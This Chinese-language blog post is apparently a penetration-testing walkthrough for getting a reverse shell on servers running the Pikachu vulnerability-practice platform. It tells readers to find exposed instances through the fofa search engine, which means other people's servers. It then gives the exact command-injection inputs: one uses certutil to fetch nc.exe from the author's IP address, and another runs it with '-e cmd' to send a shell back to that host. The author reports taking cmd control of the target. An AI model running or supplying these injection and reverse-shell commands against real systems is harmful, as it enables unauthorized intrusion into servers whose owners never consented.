渗透测试-反弹Pikachu平台服务器shell

shell反弹:Reverse shell,nc是netcat的简写,有着网络界的瑞士军刀美誉。因为它短小精悍、功能实用,被设计为一个简单、可靠的网络工具 简单的来说就是我开启监听,然后你将你的cmd命令从端口发送给我,从而控制你的cmd权限。

出站:我主动将权限经过防火墙发送出去,出站防火墙大部分允许

入站:外界经过防火墙拿走我的权限,入站防火墙安全策略较严格

开始实操

1.在fofa中寻找pikachu漏洞练习平台

渗透测试-反弹Pikachu平台服务器shell_第1张图片

2. 找到平台后,在RCE-exec“ping”中输入127.0.0.1,测试是否可以ping通,若ping通,则可以趁虚而入,之后就只可以执行相应的命令了

渗透测试-反弹Pikachu平台服务器shell_第2张图片

 3.学会使用NC,一般kali自带nc功能,在kali中找到nc.exe文件,拷贝出来

NETCAT功能总结:

  1. nc可以完成所有Telnet可以完成的工作
  2. 传输文本信息
  3. 传输文件/目录
  4. 加密传输文件
  5. 远程控制/木马
  6. 加密所有流量
  7. 流媒体服务器
  8. 远程克隆硬盘

nc文件从哪里能拿到?

(1)打开kaili,通过locate命令全盘搜索

渗透测试-反弹Pikachu平台服务器shell_第3张图片

(2)两个文件打开都可以看看,我们可以都拷贝到物理机中,放在相应的cmd命令的根目录中,如果nc文件不对就是下面这样子

渗透测试-反弹Pikachu平台服务器shell_第4张图片

如果能用,则是

渗透测试-反弹Pikachu平台服务器shell_第5张图片

 从而找到了nc.exe文件

4. 将我们需要的nc.exe放入服务器根目录中,在pikachu上执行文件下载的命令,将nc.exe文件下载到pikachu服务器上,进行反弹

渗透测试-反弹Pikachu平台服务器shell_第6张图片

 这个是我买的服务器,使用宝塔搭建,根目录为c:/wwwroot/47.101.142.119

渗透测试-反弹Pikachu平台服务器shell_第7张图片

 域名地址为47.李文盛的博客 – 又一个WordPress站点,渗透测试-反弹Pikachu平台服务器shell_第8张图片

 当我们访问47.101.142.119:8899/nc.exe时,会自动下载nc文件

测试

渗透测试-反弹Pikachu平台服务器shell_第9张图片

 5.在pikachu平台服务器中通过命令实现nc文件的下载,同时推荐一个自动生成命令的工具

[~]#棱角 ::Edge.Forum*::Edge.Forum*icon-default.png?t=M666https://forum.ywhack.com/bountytips.php?download渗透测试-反弹Pikachu平台服务器shell_第10张图片

在pikachu中输入127.0.0.1 & certutil.exe -urlcache -split -f http://47.101.142.119:8899/nc.exe 1.exe,将我本地服务器的nc文件下载到pikachu服务器中,并重命名为1.exe

渗透测试-反弹Pikachu平台服务器shell_第11张图片

通过dir命令进行文件查看,下载成功

渗透测试-反弹Pikachu平台服务器shell_第12张图片

 6.在本博主服务器上开启监听,端口随意5566

渗透测试-反弹Pikachu平台服务器shell_第13张图片

7.pikachu准备出站

127.0.0.1 & 1.exe -e cmd 47.101.142.119 5566

1.exe:这个是我们通过命令下载到pikachu服务器的文件,使用他为命令

-e:将cmd命令发送到47.101.142.119的5566端口

渗透测试-反弹Pikachu平台服务器shell_第14张图片

渗透测试-反弹Pikachu平台服务器shell_第15张图片

 成功的拿到了pikachu服务器的cmd权限

虽然拿到了服务器的权限,但我们不搞破话坏,学习为主!

 

你可能感兴趣的:(基础的渗透测试,服务器,linux,web安全)